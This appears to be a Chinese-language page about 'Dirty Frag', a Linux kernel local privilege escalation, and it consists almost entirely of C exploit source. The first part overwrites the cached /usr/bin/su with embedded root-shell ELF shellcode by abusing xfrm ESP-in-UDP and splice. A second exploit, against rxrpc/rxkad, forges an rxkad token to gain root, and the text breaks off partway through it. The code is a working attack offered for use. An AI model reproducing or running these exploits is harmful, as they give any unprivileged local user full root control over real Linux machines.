简介

  • Dirty Frag是2026年5月披露的一个影响Linux内核的高危本地提权漏洞。它允许任何本地普通用户,只需运行一段简单的代码,就能在几乎所有主流的Linux发行版上瞬间获得root权限。

payload.c

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sched.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <net/if.h>
#include <linux/if.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/xfrm.h>

#ifndef UDP_ENCAP
#define UDP_ENCAP 100
#endif
#ifndef UDP_ENCAP_ESPINUDP
#define UDP_ENCAP_ESPINUDP 2
#endif
#ifndef SOL_UDP
#define SOL_UDP 17
#endif

#define ENC_PORT         4500
#define SEQ_VAL          200
#define REPLAY_SEQ       100
#define TARGET_PATH      "/usr/bin/su"
#define PATCH_OFFSET     0              /* overwrite whole ELF starting at file[0] */
#define PAYLOAD_LEN      192            /* bytes of shell_elf to write (48 triggers) */
#define ENTRY_OFFSET     0x78           /* shellcode entry inside the new ELF */

/*
 * 192-byte minimal x86_64 root-shell ELF.
 *   _start at 0x400078:
 *     setgid(0); setuid(0); setgroups(0, NULL);
 *     execve("/bin/sh", NULL, ["TERM=xterm", NULL]);
 *   PT_LOAD covers 0xb8 bytes (the actual content) at vaddr 0x400000 R+X.
 *
 *   Setting TERM in the new shell's env silences the
 *   "tput: No value for $TERM" / "test: : integer expected" noise
 *   /etc/bash.bashrc and friends emit when TERM is unset.
 *
 * Code (from offset 0x78):
 *   31 ff               xor edi, edi
 *   31 f6               xor esi, esi
 *   31 c0               xor eax, eax
 *   b0 6a               mov al, 0x6a              ; setgid
 *   0f 05               syscall
 *   b0 69               mov al, 0x69              ; setuid
 *   0f 05               syscall
 *   b0 74               mov al, 0x74              ; setgroups
 *   0f 05               syscall
 *   6a 00               push 0                    ; envp[1] = NULL
 *   48 8d 05 12 00 00 00 lea rax, [rip+0x12]      ; rax = "TERM=xterm"
 *   50                  push rax                  ; envp[0]
 *   48 89 e2            mov rdx, rsp              ; rdx = envp
 *   48 8d 3d 12 00 00 00 lea rdi, [rip+0x12]      ; rdi = "/bin/sh"
 *   31 f6               xor esi, esi              ; rsi = NULL (argv)
 *   6a 3b 58            push 0x3b ; pop rax       ; rax = 59 (execve)
 *   0f 05               syscall                   ; execve("/bin/sh",NULL,envp)
 *   "TERM=xterm\0"      (offset 0xa5..0xaf)
 *   "/bin/sh\0"         (offset 0xb0..0xb7)
 */
static const uint8_t shell_elf[PAYLOAD_LEN] = {
    0x7f,0x45,0x4c,0x46,0x02,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x02,0x00,0x3e,0x00,0x01,0x00,0x00,0x00,0x78,0x00,0x40,0x00,0x00,0x00,0x00,0x00,
    0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x40,0x00,0x38,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x01,0x00,0x00,0x00,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,
    0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x31,0xff,0x31,0xf6,0x31,0xc0,0xb0,0x6a,
    0x0f,0x05,0xb0,0x69,0x0f,0x05,0xb0,0x74,0x0f,0x05,0x6a,0x00,0x48,0x8d,0x05,0x12,
    0x00,0x00,0x00,0x50,0x48,0x89,0xe2,0x48,0x8d,0x3d,0x12,0x00,0x00,0x00,0x31,0xf6,
    0x6a,0x3b,0x58,0x0f,0x05,0x54,0x45,0x52,0x4d,0x3d,0x78,0x74,0x65,0x72,0x6d,0x00,
    0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
};

extern int g_su_verbose;
int g_su_verbose = 0;
#define SLOG(fmt, ...) do { if (g_su_verbose) fprintf(stderr, "[su] " fmt "\n", ##__VA_ARGS__); } while (0)

static int write_proc(const char *path, const char *buf)
{
    int fd = open(path, O_WRONLY);
    if (fd < 0) return -1;
    int n = write(fd, buf, strlen(buf));
    close(fd);
    return n;
}

static void setup_userns_netns(void)
{
    uid_t real_uid = getuid();
    gid_t real_gid = getgid();
    if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
        SLOG("unshare: %s", strerror(errno));
        exit(1);
    }
    write_proc("/proc/self/setgroups", "deny");
    char map[64];
    snprintf(map, sizeof(map), "0 %u 1", real_uid);
    if (write_proc("/proc/self/uid_map", map) < 0) {
        SLOG("uid_map: %s", strerror(errno)); exit(1);
    }
    snprintf(map, sizeof(map), "0 %u 1", real_gid);
    if (write_proc("/proc/self/gid_map", map) < 0) {
        SLOG("gid_map: %s", strerror(errno)); exit(1);
    }
    int s = socket(AF_INET, SOCK_DGRAM, 0);
    if (s < 0) { SLOG("socket: %s", strerror(errno)); exit(1); }
    struct ifreq ifr; memset(&ifr, 0, sizeof(ifr));
    strncpy(ifr.ifr_name, "lo", IFNAMSIZ);
    if (ioctl(s, SIOCGIFFLAGS, &ifr) < 0) { SLOG("SIOCGIFFLAGS: %s", strerror(errno)); exit(1); }
    ifr.ifr_flags |= IFF_UP | IFF_RUNNING;
    if (ioctl(s, SIOCSIFFLAGS, &ifr) < 0) { SLOG("SIOCSIFFLAGS: %s", strerror(errno)); exit(1); }
    close(s);
}

static void put_attr(struct nlmsghdr *nlh, int type, const void *data, size_t len)
{
    struct rtattr *rta = (struct rtattr *)((char *)nlh + NLMSG_ALIGN(nlh->nlmsg_len));
    rta->rta_type = type;
    rta->rta_len  = RTA_LENGTH(len);
    memcpy(RTA_DATA(rta), data, len);
    nlh->nlmsg_len = NLMSG_ALIGN(nlh->nlmsg_len) + RTA_ALIGN(rta->rta_len);
}

static int add_xfrm_sa(uint32_t spi, uint32_t patch_seqhi)
{
    int sk = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);
    if (sk < 0) return -1;
    struct sockaddr_nl nl = { .nl_family = AF_NETLINK };
    if (bind(sk, (struct sockaddr*)&nl, sizeof(nl)) < 0) { close(sk); return -1; }

    char buf[4096] = {0};
    struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
    nlh->nlmsg_type  = XFRM_MSG_NEWSA;
    nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
    nlh->nlmsg_pid   = getpid();
    nlh->nlmsg_seq   = 1;
    nlh->nlmsg_len   = NLMSG_LENGTH(sizeof(struct xfrm_usersa_info));

    struct xfrm_usersa_info *xs = (struct xfrm_usersa_info *)NLMSG_DATA(nlh);
    xs->id.daddr.a4 = inet_addr("127.0.0.1");
    xs->id.spi      = htonl(spi);
    xs->id.proto    = IPPROTO_ESP;
    xs->saddr.a4    = inet_addr("127.0.0.1");
    xs->family      = AF_INET;
    xs->mode        = XFRM_MODE_TRANSPORT;
    xs->replay_window = 0;
    xs->reqid       = 0x1234;
    xs->flags       = XFRM_STATE_ESN;
    xs->lft.soft_byte_limit   = (uint64_t)-1;
    xs->lft.hard_byte_limit   = (uint64_t)-1;
    xs->lft.soft_packet_limit = (uint64_t)-1;
    xs->lft.hard_packet_limit = (uint64_t)-1;
    xs->sel.family  = AF_INET;
    xs->sel.prefixlen_d = 32;
    xs->sel.prefixlen_s = 32;
    xs->sel.daddr.a4 = inet_addr("127.0.0.1");
    xs->sel.saddr.a4 = inet_addr("127.0.0.1");

    {
        char alg_buf[sizeof(struct xfrm_algo_auth) + 32];
        memset(alg_buf, 0, sizeof(alg_buf));
        struct xfrm_algo_auth *aa = (struct xfrm_algo_auth *)alg_buf;
        strncpy(aa->alg_name, "hmac(sha256)", sizeof(aa->alg_name)-1);
        aa->alg_key_len   = 32 * 8;
        aa->alg_trunc_len = 128;
        memset(aa->alg_key, 0xAA, 32);
        put_attr(nlh, XFRMA_ALG_AUTH_TRUNC, alg_buf, sizeof(alg_buf));
    }
    {
        char alg_buf[sizeof(struct xfrm_algo) + 16];
        memset(alg_buf, 0, sizeof(alg_buf));
        struct xfrm_algo *ea = (struct xfrm_algo *)alg_buf;
        strncpy(ea->alg_name, "cbc(aes)", sizeof(ea->alg_name)-1);
        ea->alg_key_len = 16 * 8;
        memset(ea->alg_key, 0xBB, 16);
        put_attr(nlh, XFRMA_ALG_CRYPT, alg_buf, sizeof(alg_buf));
    }
    {
        struct xfrm_encap_tmpl enc;
        memset(&enc, 0, sizeof(enc));
        enc.encap_type  = UDP_ENCAP_ESPINUDP;
        enc.encap_sport = htons(ENC_PORT);
        enc.encap_dport = htons(ENC_PORT);
        enc.encap_oa.a4 = 0;
        put_attr(nlh, XFRMA_ENCAP, &enc, sizeof(enc));
    }
    {
        char esn_buf[sizeof(struct xfrm_replay_state_esn) + 4];
        memset(esn_buf, 0, sizeof(esn_buf));
        struct xfrm_replay_state_esn *esn = (struct xfrm_replay_state_esn *)esn_buf;
        esn->bmp_len       = 1;
        esn->oseq          = 0;
        esn->seq           = REPLAY_SEQ;
        esn->oseq_hi       = 0;
        esn->seq_hi        = patch_seqhi;
        esn->replay_window = 32;
        put_attr(nlh, XFRMA_REPLAY_ESN_VAL, esn_buf, sizeof(esn_buf));
    }

    if (send(sk, nlh, nlh->nlmsg_len, 0) < 0) { close(sk); return -1; }
    char rbuf[4096];
    int n = recv(sk, rbuf, sizeof(rbuf), 0);
    if (n < 0) { close(sk); return -1; }
    struct nlmsghdr *rh = (struct nlmsghdr *)rbuf;
    if (rh->nlmsg_type == NLMSG_ERROR) {
        struct nlmsgerr *e = NLMSG_DATA(rh);
        if (e->error) { close(sk); return -1; }
    }
    close(sk);
    return 0;
}

static int do_one_write(const char *path, off_t offset, uint32_t spi)
{
    int sk_recv = socket(AF_INET, SOCK_DGRAM, 0);
    if (sk_recv < 0) return -1;
    int one = 1;
    setsockopt(sk_recv, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one));
    struct sockaddr_in sa_d = {
        .sin_family = AF_INET,
        .sin_port   = htons(ENC_PORT),
        .sin_addr   = { inet_addr("127.0.0.1") },
    };
    if (bind(sk_recv, (struct sockaddr*)&sa_d, sizeof(sa_d)) < 0) {
        close(sk_recv); return -1;
    }
    int encap = UDP_ENCAP_ESPINUDP;
    if (setsockopt(sk_recv, IPPROTO_UDP, UDP_ENCAP, &encap, sizeof(encap)) < 0) {
        close(sk_recv); return -1;
    }
    int sk_send = socket(AF_INET, SOCK_DGRAM, 0);
    if (sk_send < 0) { close(sk_recv); return -1; }
    if (connect(sk_send, (struct sockaddr*)&sa_d, sizeof(sa_d)) < 0) {
        close(sk_send); close(sk_recv); return -1;
    }
    int file_fd = open(path, O_RDONLY);
    if (file_fd < 0) { close(sk_send); close(sk_recv); return -1; }

    int pfd[2];
    if (pipe(pfd) < 0) { close(file_fd); close(sk_send); close(sk_recv); return -1; }

    uint8_t hdr[24];
    *(uint32_t*)(hdr + 0) = htonl(spi);
    *(uint32_t*)(hdr + 4) = htonl(SEQ_VAL);
    memset(hdr + 8, 0xCC, 16);

    struct iovec iov_h = { .iov_base = hdr, .iov_len = sizeof(hdr) };
    if (vmsplice(pfd[1], &iov_h, 1, 0) != (ssize_t)sizeof(hdr)) {
        close(file_fd); close(pfd[0]); close(pfd[1]); close(sk_send); close(sk_recv); return -1;
    }
    off_t off = offset;
    ssize_t s = splice(file_fd, &off, pfd[1], NULL, 16, SPLICE_F_MOVE);
    if (s != 16) {
        close(file_fd); close(pfd[0]); close(pfd[1]); close(sk_send); close(sk_recv); return -1;
    }
    s = splice(pfd[0], NULL, sk_send, NULL, 24 + 16, SPLICE_F_MOVE);
    /* still proceed regardless of splice rc — kernel may have already
     * decrypted the page in the time between splice and recv */
    usleep(150 * 1000);

    close(file_fd); close(pfd[0]); close(pfd[1]);
    close(sk_send); close(sk_recv);
    return s == 40 ? 0 : -1;
}

static int verify_byte(const char *path, off_t offset, uint8_t want)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    uint8_t got;
    if (pread(fd, &got, 1, offset) != 1) { close(fd); return -1; }
    close(fd);
    return got == want ? 0 : -1;
}

static int corrupt_su(void)
{
    setup_userns_netns();
    usleep(100 * 1000);

    /* Install 40 xfrm SAs, one per 4-byte chunk.  Each carries the
     * desired payload word in its seq_hi field. */
    for (int i = 0; i < PAYLOAD_LEN / 4; i++) {
        uint32_t spi = 0xDEADBE10 + i;
        uint32_t seqhi =
            ((uint32_t)shell_elf[i*4 + 0] << 24) |
            ((uint32_t)shell_elf[i*4 + 1] << 16) |
            ((uint32_t)shell_elf[i*4 + 2] <<  8) |
            ((uint32_t)shell_elf[i*4 + 3]);
        if (add_xfrm_sa(spi, seqhi) < 0) {
            SLOG("add_xfrm_sa #%d failed", i);
            return -1;
        }
    }
    SLOG("installed %d xfrm SAs", PAYLOAD_LEN / 4);

    for (int i = 0; i < PAYLOAD_LEN / 4; i++) {
        uint32_t spi = 0xDEADBE10 + i;
        off_t off = PATCH_OFFSET + i * 4;
        if (do_one_write(TARGET_PATH, off, spi) < 0) {
            SLOG("do_one_write #%d at off=0x%lx failed", i, (long)off);
            return -1;
        }
    }
    SLOG("wrote %d bytes to %s starting at 0x%x",
            PAYLOAD_LEN, TARGET_PATH, PATCH_OFFSET);
    return 0;
}

int su_lpe_main(int argc, char **argv)
{
    for (int i = 1; i < argc; i++) {
        if (!strcmp(argv[i], "-v") || !strcmp(argv[i], "--verbose"))
            g_su_verbose = 1;
        else if (!strcmp(argv[i], "--corrupt-only"))
            ; /* compat: this body always corrupts only */
    }
    if (getenv("DIRTYFRAG_VERBOSE")) g_su_verbose = 1;

    pid_t cpid = fork();
    if (cpid < 0) return 1;
    if (cpid == 0) {
        int rc = corrupt_su();
        _exit(rc == 0 ? 0 : 2);
    }
    int cstatus;
    waitpid(cpid, &cstatus, 0);
    if (!WIFEXITED(cstatus) || WEXITSTATUS(cstatus) != 0) {
        SLOG("corruption stage failed (status=0x%x)", cstatus);
        return 1;
    }

    /* Sanity check: bytes at the embedded ELF entry (file offset 0x78
     * after our overwrite) should be 0x31 0xff (xor edi, edi — first
     * instruction of the new shellcode). */
    if (verify_byte(TARGET_PATH, ENTRY_OFFSET, 0x31) != 0 ||
            verify_byte(TARGET_PATH, ENTRY_OFFSET + 1, 0xff) != 0) {
        SLOG("post-write verify failed (target unchanged)");
        return 1;
    }
    SLOG("/usr/bin/su page-cache patched (entry 0x%x = shellcode)",
            ENTRY_OFFSET);
    return 0;
}
/*
 * rxrpc/rxkad LPE — uid=1000 → root
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <stdarg.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#include <time.h>
#include <sched.h>
#include <poll.h>
#include <signal.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/uio.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <linux/rxrpc.h>
#include <linux/keyctl.h>
#include <linux/if_alg.h>
#include <net/if.h>
#include <termios.h>

#ifndef AF_RXRPC
#define AF_RXRPC 33
#endif
#ifndef PF_RXRPC
#define PF_RXRPC AF_RXRPC
#endif
#ifndef SOL_RXRPC
#define SOL_RXRPC 272
#endif
#ifndef SOL_ALG
#define SOL_ALG 279
#endif
#ifndef AF_ALG
#define AF_ALG 38
#endif
#ifndef MSG_SPLICE_PAGES
#define MSG_SPLICE_PAGES 0x8000000
#endif

/* ---- rxrpc constants ---- */
#define RXRPC_PACKET_TYPE_DATA          1
#define RXRPC_PACKET_TYPE_ACK           2
#define RXRPC_PACKET_TYPE_ABORT         4
#define RXRPC_PACKET_TYPE_CHALLENGE     6
#define RXRPC_PACKET_TYPE_RESPONSE      7
#define RXRPC_CLIENT_INITIATED          0x01
#define RXRPC_REQUEST_ACK               0x02
#define RXRPC_LAST_PACKET               0x04
#define RXRPC_CHANNELMASK               3
#define RXRPC_CIDSHIFT                  2

struct rxrpc_wire_header {
    uint32_t epoch;
    uint32_t cid;
    uint32_t callNumber;
    uint32_t seq;
    uint32_t serial;
    uint8_t  type;
    uint8_t  flags;
    uint8_t  userStatus;
    uint8_t  securityIndex;
    uint16_t cksum;        /* big-endian on wire */
    uint16_t serviceId;
} __attribute__((packed));

struct rxkad_challenge {
    uint32_t version;
    uint32_t nonce;
    uint32_t min_level;
    uint32_t __padding;
} __attribute__((packed));

/* Attacker-chosen 8-byte session key used for the rxkad token.
 * Mutable because the LPE brute-force iterates over keys looking for
 * one that decrypts the file's UID field to a "0:" prefix. */
static uint8_t SESSION_KEY[8] = {
    0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08
};

#define LOG(fmt, ...) fprintf(stderr, "[+] " fmt "\n", ##__VA_ARGS__)
#define WARN(fmt, ...) fprintf(stderr, "[!] " fmt "\n", ##__VA_ARGS__)
#define DBG(fmt, ...) fprintf(stderr, "[.] " fmt "\n", ##__VA_ARGS__)

/* =================================================================== */
/* unshare + map setup                                                  */
/* =================================================================== */

static int write_file(const char *path, const char *fmt, ...)
{
    int fd = open(path, O_WRONLY);
    if (fd < 0) return -1;
    char buf[256]; va_list ap; va_start(ap, fmt);
    int n = vsnprintf(buf, sizeof(buf), fmt, ap); va_end(ap);
    int r = (int)write(fd, buf, n); close(fd);
    return r;
}

static int do_unshare_userns_netns(void)
{
    uid_t real_uid = getuid();
    gid_t real_gid = getgid();
    if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
        WARN("unshare(NEWUSER|NEWNET): %s", strerror(errno));
        return -1;
    }
    LOG("unshare(USER|NET) OK, real uid=%u", real_uid);
    write_file("/proc/self/setgroups", "deny");
    if (write_file("/proc/self/uid_map", "%u %u 1", real_uid, real_uid) < 0) {
        WARN("uid_map: %s", strerror(errno)); return -1;
    }
    if (write_file("/proc/self/gid_map", "%u %u 1", real_gid, real_gid) < 0) {
        WARN("gid_map: %s", strerror(errno)); return -1;
    }
    LOG("uid/gid identity-mapped %u/%u; gained CAP_NET_RAW within netns",
            real_uid, real_gid);

    /* ifup lo */
    int s = socket(AF_INET, SOCK_DGRAM, 0);
    if (s >= 0) {
        struct ifreq ifr; memset(&ifr, 0, sizeof(ifr));
        strcpy(ifr.ifr_name, "lo");
        if (ioctl(s, SIOCGIFFLAGS, &ifr) == 0) {
            ifr.ifr_flags |= IFF_UP | IFF_RUNNING;
            if (ioctl(s, SIOCSIFFLAGS, &ifr) < 0)
                WARN("SIOCSIFFLAGS lo: %s", strerror(errno));
            else
                LOG("lo brought UP in new netns");
        }
        close(s);
    }
    return 0;
}

/* =================================================================== */
/* rxrpc key (rxkad v1 token with attacker session key)                 */
/* =================================================================== */

static long key_add(const char *type, const char *desc,
        const void *payload, size_t plen, int ringid)
{
    return syscall(SYS_add_key, type, desc, payload, plen, ringid);
}

static int build_rxrpc_v1_token(uint8_t *out, size_t maxlen)
{
    uint8_t *p = out;
    uint32_t now = (uint32_t)time(NULL);
    uint32_t expires = now + 86400;
    *(uint32_t *)p = htonl(0); p += 4;   /* flags */
    const char *cell = "evil";
    uint32_t clen = strlen(cell);
    *(uint32_t *)p = htonl(clen); p += 4;
    memcpy(p, cell, clen);
    uint32_t pad = (4 - (clen & 3)) & 3;
    memset(p + clen, 0, pad);
    p += clen + pad;
    *(uint32_t *)p = htonl(1); p += 4;   /* ntoken */
    uint8_t *toklen_p = p; p += 4;
    uint8_t *tokstart = p;
    *(uint32_t *)p = htonl(2); p += 4;   /* sec_ix = RXKAD */
    *(uint32_t *)p = htonl(0); p += 4;   /* vice_id */
    *(uint32_t *)p = htonl(1); p += 4;   /* kvno */
    memcpy(p, SESSION_KEY, 8); p += 8;   /* session_key K */
    *(uint32_t *)p = htonl(now); p += 4;
    *(uint32_t *)p = htonl(expires); p += 4;
    *(uint32_t *)p = htonl(1); p += 4;   /* primary_flag */
    *(uint32_t *)p = htonl(8); p += 4;   /* ticket_len */
    memset(p, 0xCC, 8); p += 8;          /* ticket */
    uint32_t toklen = (uint32_t)(p - tokstart);
    *(uint32_t *)toklen_p = htonl(toklen);
    if ((size_t)(p - out) > maxlen) { errno = E2BIG; return -1; }
    return (int)(p - out);
}

static long add_rxrpc_key(const char *desc)
{
    uint8_t buf[512];
    int n = build_rxrpc_v1_token(buf, sizeof(buf));
    if (n < 0) return -1;
    return key_add("rxrpc", desc, buf, n, KEY_SPEC_PROCESS_KEYRING);
}

/* =================================================================== */
/* AF_ALG pcbc(fcrypt) helpers                                          */
/* =================================================================== */

static int alg_open_pcbc_fcrypt(const uint8_t key[8])
{
    int s = socket(AF_ALG, SOCK_SEQPACKET, 0);
    if (s < 0) { WARN("socket(AF_ALG): %s", strerror(errno)); return -1; }
    struct sockaddr_alg sa = { .salg_family = AF_ALG };
    strcpy((char *)sa.salg_type, "skcipher");
    strcpy((char *)sa.salg_name, "pcbc(fcrypt)");
    if (bind(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
        WARN("bind(AF_ALG pcbc(fcrypt)): %s", strerror(errno));
        close(s); return -1;
    }
    if (setsockopt(s, SOL_ALG, ALG_SET_KEY, key, 8) < 0) {
        WARN("ALG_SET_KEY: %s", strerror(errno));
        close(s); return -1;
    }
    return s;
}

/* Encrypt-or-decrypt a 1+ block of data with a given IV. */
static int alg_op(int alg_s, int op, const uint8_t iv[8],
        const void *in, size_t inlen, void *out)
{
    int op_fd = accept(alg_s, NULL, NULL);
    if (op_fd < 0) { WARN("accept(AF_ALG): %s", strerror(errno)); return -1; }

    char cbuf[CMSG_SPACE(sizeof(int)) +
        CMSG_SPACE(sizeof(struct af_alg_iv) + 8)] = {0};
    struct msghdr msg = {0};
    msg.msg_control = cbuf;
    msg.msg_controllen = sizeof(cbuf);

    struct cmsghdr *c = CMSG_FIRSTHDR(&msg);
    c->cmsg_level = SOL_ALG;
    c->cmsg_type = ALG_SET_OP;
    c->cmsg_len = CMSG_LEN(sizeof(int));
    *(int *)CMSG_DATA(c) = op;

    c = CMSG_NXTHDR(&msg, c);
    c->cmsg_level = SOL_ALG;
    c->cmsg_type = ALG_SET_IV;
    c->cmsg_len = CMSG_LEN(sizeof(struct af_alg_iv) + 8);
    struct af_alg_iv *aiv = (struct af_alg_iv *)CMSG_DATA(c);
    aiv->ivlen = 8;
    memcpy(aiv->iv, iv, 8);

    struct iovec iov = { .iov_base = (void *)in, .iov_len = inlen };
    msg.msg_iov = &iov; msg.msg_iovlen = 1;

    if (sendmsg(op_fd, &msg, 0) < 0) {
        WARN("AF_ALG sendmsg: %s", strerror(errno));
        close(op_fd); return -1;
    }
    ssize_t n = read(op_fd, out, inlen);
    close(op_fd);
    if (n != (ssize_t)inlen) {
        WARN("AF_ALG read got %zd want %zu: %s",
                n, inlen, strerror(errno));
        return -1;
    }
    return 0;
}

/* Compute conn->rxkad.csum_iv (ref: rxkad_prime_packet_security):
 *   tmpbuf[0..3] = htonl(epoch, cid, 0, security_ix)  (16 B)
 *   PCBC-encrypt(tmpbuf, IV=session_key) → out[16]
 *   csum_iv = out[8..15]   (last 8 B = "tmpbuf[2..3]" after encryption)
 */
static int compute_csum_iv(uint32_t epoch, uint32_t cid, uint32_t sec_ix,
        const uint8_t key[8], uint8_t csum_iv[8])
{
    int s = alg_open_pcbc_fcrypt(key);
    if (s < 0) return -1;
    uint32_t in[4]  = { htonl(epoch), htonl(cid), 0, htonl(sec_ix) };
    uint8_t  out[16];
    int rc = alg_op(s, ALG_OP_ENCRYPT, key, in, 16, out);
    close(s);
    if (rc < 0) return -1;
    memcpy(csum_iv, out + 8, 8);
    return 0;
}

/* Compute the wire cksum (ref: rxkad_secure_packet @rxkad.c:342):
 *   x = (cid_low2 << 30) | (seq & 0x3fffffff)
 *   buf[0] = htonl(call_id), buf[1] = htonl(x)    (8 B)
 *   PCBC-encrypt(buf, IV=csum_iv) → enc[8]
 *   y = ntohl(enc[1]); cksum = (y >> 16) & 0xffff;  if zero -> 1
 */
static int compute_cksum(uint32_t cid, uint32_t call_id, uint32_t seq,
        const uint8_t key[8], const uint8_t csum_iv[8],
        uint16_t *cksum_out)
{
    int s = alg_open_pcbc_fcrypt(key);
    if (s < 0) return -1;
    uint32_t x = (cid & RXRPC_CHANNELMASK) << (32 - RXRPC_CIDSHIFT);
    x |= seq & 0x3fffffff;
    uint32_t in[2] = { htonl(call_id), htonl(x) };
    uint32_t out[2];
    int rc = alg_op(s, ALG_OP_ENCRYPT, csum_iv, in, 8, out);
    close(s);
    if (rc < 0) return -1;
    uint32_t y = ntohl(out[1]);
    uint16_t v = (y >> 16) & 0xffff;
    if (v == 0) v = 1;
    *cksum_out = v;
    return 0;
}

/* =================================================================== */
/* AF_RXRPC client                                                      */
/* =================================================================== */

static int setup_rxrpc_client(uint16_t local_port, const char *keyname)
{
    int fd = socket(AF_RXRPC, SOCK_DGRAM, PF_INET);
    if (fd < 0) { WARN("socket(AF_RXRPC client): %s", strerror(errno)); return -1; }
    if (setsockopt(fd, SOL_RXRPC, RXRPC_SECURITY_KEY,
                keyname, strlen(keyname)) < 0) {
        WARN("client SECURITY_KEY: %s", strerror(errno)); close(fd); return -1;
    }
    int min_level = RXRPC_SECURITY_AUTH;
    if (setsockopt(fd, SOL_RXRPC, RXRPC_MIN_SECURITY_LEVEL,
                &min_level, sizeof(min_level)) < 0) {
        WARN("client MIN_SECURITY_LEVEL: %s", strerror(errno));
        close(fd); return -1;
    }
    struct sockaddr_rxrpc srx = {0};
    srx.srx_family = AF_RXRPC;
    srx.srx_service = 0;
    srx.transport_type = SOCK_DGRAM;
    srx.transport_len = sizeof(struct sockaddr_in);
    srx.transport.sin.sin_family = AF_INET;
    srx.transport.sin.sin_port = htons(local_port);
    srx.transport.sin.sin_addr.s_addr = htonl(0x7F000001);
    if (bind(fd, (struct sockaddr *)&srx, sizeof(srx)) < 0) {
        WARN("client bind :%u: %s", local_port, strerror(errno));
        close(fd); return -1;
    }
    LOG("AF_RXRPC client bound :%u", local_port);
    return fd;
}

static int rxrpc_client_initiate_call(int cli_fd, uint16_t srv_port,
        uint16_t service_id,
        unsigned long user_call_id)
{
    char data[8] = "PINGPING";
    struct sockaddr_rxrpc srx = {0};
    srx.srx_family = AF_RXRPC;
    srx.srx_service = service_id;
    srx.transport_type = SOCK_DGRAM;
    srx.transport_len = sizeof(struct sockaddr_in);
    srx.transport.sin.sin_family = AF_INET;
    srx.transport.sin.sin_port = htons(srv_port);
    srx.transport.sin.sin_addr.s_addr = htonl(0x7F000001);

    char cmsg_buf[CMSG_SPACE(sizeof(unsigned long))];
    struct msghdr msg = {0};
    msg.msg_name = &srx; msg.msg_namelen = sizeof(srx);
    struct iovec iov = { .iov_base = data, .iov_len = sizeof(data) };
    msg.msg_iov = &iov; msg.msg_iovlen = 1;
    msg.msg_control = cmsg_buf; msg.msg_controllen = sizeof(cmsg_buf);
    struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
    cmsg->cmsg_level = SOL_RXRPC;
    cmsg->cmsg_type = RXRPC_USER_CALL_ID;
    cmsg->cmsg_len = CMSG_LEN(sizeof(unsigned long));
    *(unsigned long *)CMSG_DATA(cmsg) = user_call_id;

    /* Don't block forever if no reply ever comes through this single sendmsg. */
    int fl = fcntl(cli_fd, F_GETFL);
    fcntl(cli_fd, F_SETFL, fl | O_NONBLOCK);

    ssize_t n = sendmsg(cli_fd, &msg, 0);
    fcntl(cli_fd, F_SETFL, fl);
    if (n < 0) {
        if (errno == EAGAIN || errno == EWOULDBLOCK) {
            LOG("client sendmsg returned EAGAIN (expected; kernel will keep "
                    "retrying handshake)");
            return 0;
        }
        WARN("client sendmsg: %s", strerror(errno));
        return -1;
    }
    LOG("client sendmsg %zd B → :%u (handshake will follow asynchronously)",
            n, srv_port);
    return 0;
}

/* =================================================================== */
/* fake-server (plain UDP)                                              */
/* =================================================================== */

static int setup_udp_server(uint16_t port)
{
    int s = socket(AF_INET, SOCK_DGRAM, 0);
    if (s < 0) { WARN("socket(udp server): %s", strerror(errno)); return -1; }
    struct sockaddr_in sa = {0};
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    sa.sin_addr.s_addr = htonl(0x7F000001);
    if (bind(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
        WARN("udp server bind :%u: %s", port, strerror(errno));
        close(s); return -1;
    }
    LOG("plain UDP fake-server bound :%u", port);
    return s;
}

/* Receive one UDP datagram with timeout (ms). Returns bytes or -1. */
static ssize_t udp_recv_to(int s, void *buf, size_t cap,
        struct sockaddr_in *from, int timeout_ms)
{
    struct pollfd pfd = { .fd = s, .events = POLLIN };
    int rc = poll(&pfd, 1, timeout_ms);
    if (rc <= 0) return -1;
    socklen_t fl = from ? sizeof(*from) : 0;
    return recvfrom(s, buf, cap, 0,
            (struct sockaddr *)from, from ? &fl : NULL);
}

/* =================================================================== */
/* main PoC                                                             */
/* =================================================================== */

static int trigger_seq = 0;

static int do_one_trigger(int target_fd, off_t splice_off, size_t splice_len)
{
    char keyname[32];
    snprintf(keyname, sizeof(keyname), "evil%d", trigger_seq++);

